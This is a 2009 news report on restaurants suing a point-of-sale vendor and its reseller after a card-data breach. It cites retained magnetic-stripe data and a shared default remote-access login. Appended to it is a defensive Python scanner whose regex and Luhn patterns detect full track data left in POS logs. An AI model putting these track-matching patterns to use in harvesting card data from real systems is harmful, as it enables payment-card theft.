November 30, 2009

Seven restaurants have sued the maker of a bank card-processing system for failing to secure the product from a Romanian hacker who breached their systems.

The restaurants, located in Louisiana and Mississippi, have filed a class-action suit against Georgia-based Radiant Systems for producing a point-of-sale (POS) system that they say was not compliant with payment card industry security standards and resulted in an undetermined number of customers having their debit and credit card numbers stolen.

The suit alleges that the system stored all of the data embedded on the bank card magnetic stripe after the transaction was completed -- a violation of industry security standards that made the systems a high-risk target for hackers.

Also named in the suit is Computer World, a Louisiana-based retailer, which sold and maintained Radiant's Aloha POS system.

According to plaintiffs, Computer World's technicians allegedly installed the remote-access program PCAnywhere on the systems to allow its technicians to fix technical problems from off-site. The only problem is, the company failed to secure the program. The suit alleges that the system was not up to date with software patches, and the PCAnywhere remote log-in and password that technicians used to access the POS systems was the same at every one of the 200 Louisiana locations where the system was installed. According to one of the plaintiffs who spoke with Threat Level, the default login was "administrator" and the password was "computer."
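The core of the suit is that the POS system kept the full magnetic-stripe contents after authorization, which PCI DSS forbids. The scanner below is an added example (not from the article, not Radiant's or anyone's product code) of the check a merchant or assessor could run over an exported transaction store to find such retained track data: it matches the ISO/IEC 7813 Track 1 and Track 2 framing, drops matches whose PAN fails the Luhn check so random digit runs are not reported, and emits only a masked PAN so the finding is not itself another copy of cardholder data. The log records are constructed, and the card number in them is the standard 4111... test number.

```python
import re
from typing import Dict, Iterable, List

# Constructed sample of a POS transaction store. After authorization only a
# truncated PAN should survive; a record holding a full Track 1 or Track 2
# string is exactly the retention the lawsuit describes.
SAMPLE_RECORDS = [
    "2009-11-28 19:02:11 term=03 auth=OK pan=****1111 amt=42.50",
    "2009-11-28 19:05:40 term=03 auth=OK track2=;4111111111111111=12121011234567890?",
    "2009-11-28 19:07:02 term=01 auth=OK track1=%B4111111111111111^DOE/JANE^1212101?",
    "2009-11-28 19:09:55 term=02 auth=DECLINED pan=****0005 amt=10.00",
    # Sentinel-framed but not a valid card number: must not be reported.
    "2009-11-28 19:11:13 term=02 debug track2=;1234567890123456=1212101000?",
]

# ISO/IEC 7813 framing:
#   Track 2: ';' PAN '=' YYMM service-code discretionary '?'
#   Track 1: '%B' PAN '^' name '^' YYMM service-code discretionary '?'
TRACK2_RE = re.compile(r";(\d{13,19})=(\d{4})(\d{3})(\d*)\?")
TRACK1_RE = re.compile(r"%B(\d{13,19})\^([^^]{2,26})\^(\d{4})(\d{3})([^?]*)\?")


def luhn_ok(pan: str) -> bool:
    """Return True if the digit string passes the Luhn check used for PANs."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:          # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def mask_pan(pan: str) -> str:
    """Keep the first six and last four digits, the usual display form."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def find_retained_track_data(lines: Iterable[str]) -> List[Dict]:
    """Report every record that still holds full Track 1 or Track 2 data.

    Each finding carries the record number, which track was found, the
    masked PAN, and the expiry and service code recovered from the track.
    """
    findings: List[Dict] = []
    for lineno, line in enumerate(lines, start=1):
        for m in TRACK2_RE.finditer(line):
            pan = m.group(1)
            if luhn_ok(pan):
                findings.append({"line": lineno, "track": 2, "pan": mask_pan(pan),
                                 "expiry": m.group(2), "service_code": m.group(3)})
        for m in TRACK1_RE.finditer(line):
            pan = m.group(1)
            if luhn_ok(pan):
                findings.append({"line": lineno, "track": 1, "pan": mask_pan(pan),
                                 "expiry": m.group(3), "service_code": m.group(4)})
    return findings


if __name__ == "__main__":
    for f in find_retained_track_data(SAMPLE_RECORDS):
        print(f"record {f['line']}: full Track {f['track']} data retained, "
              f"PAN {f['pan']}, exp {f['expiry']}, service code {f['service_code']}")
```

Run against the constructed records it reports two retentions (a Track 2 string in record 2 and a Track 1 string in record 3) and stays silent on the truncated PANs and on the sentinel-framed number that fails Luhn. In practice the same scan is pointed at database dumps, debug logs and swap or temp files on the POS host, since those are the places full track data tends to accumulate unnoticed.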
